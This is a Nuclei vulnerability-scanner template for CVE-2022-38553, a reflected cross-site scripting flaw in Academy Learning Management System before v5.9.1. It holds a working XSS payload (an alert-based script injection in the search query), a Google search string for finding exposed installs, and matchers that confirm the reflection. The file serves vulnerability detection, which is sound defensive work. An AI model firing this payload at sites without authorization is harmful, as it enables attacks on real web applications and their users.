nuclei-templates/cves/2022/CVE-2022-38553.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-09-29 17:21:28 +00:00
id: CVE-2022-38553
info:
name: Academy Learning Management System < v5.9.1 - Reflected XSS
author: edoardottt
severity: medium
description: |
Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.
reference:
- https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity
- https://github.com/4websecurity/CVE-2022-38553
- https://nvd.nist.gov/vuln/detail/CVE-2022-38553
- https://codecanyon.net/item/academy-course-based-learning-management-system/22703468
2022-09-29 17:21:28 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2022-09-29 17:21:28 +00:00
cve-id: CVE-2022-38553
cwe-id: CWE-79
2022-09-29 17:21:28 +00:00
metadata:
google-query: intext:"Study any topic, anytime"
verified: "true"
2022-09-29 17:49:28 +00:00
tags: cve,cve2022,academylms,xss
2022-09-29 17:21:28 +00:00
requests:
- method: GET
path:
2022-09-29 17:49:28 +00:00
- '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
2022-09-29 17:21:28 +00:00
matchers-condition: and
matchers:
- type: word
2022-09-29 17:49:28 +00:00
part: body
2022-09-29 17:21:28 +00:00
words:
2022-09-29 17:49:28 +00:00
- '"><script>alert(document.domain)</script>'
- 'Study any topic'
condition: and
2022-09-29 17:21:28 +00:00
- type: word
2022-09-29 17:49:28 +00:00
part: header
2022-09-29 17:21:28 +00:00
words:
2022-09-29 17:49:28 +00:00
- 'text/html'
- type: status
status:
- 200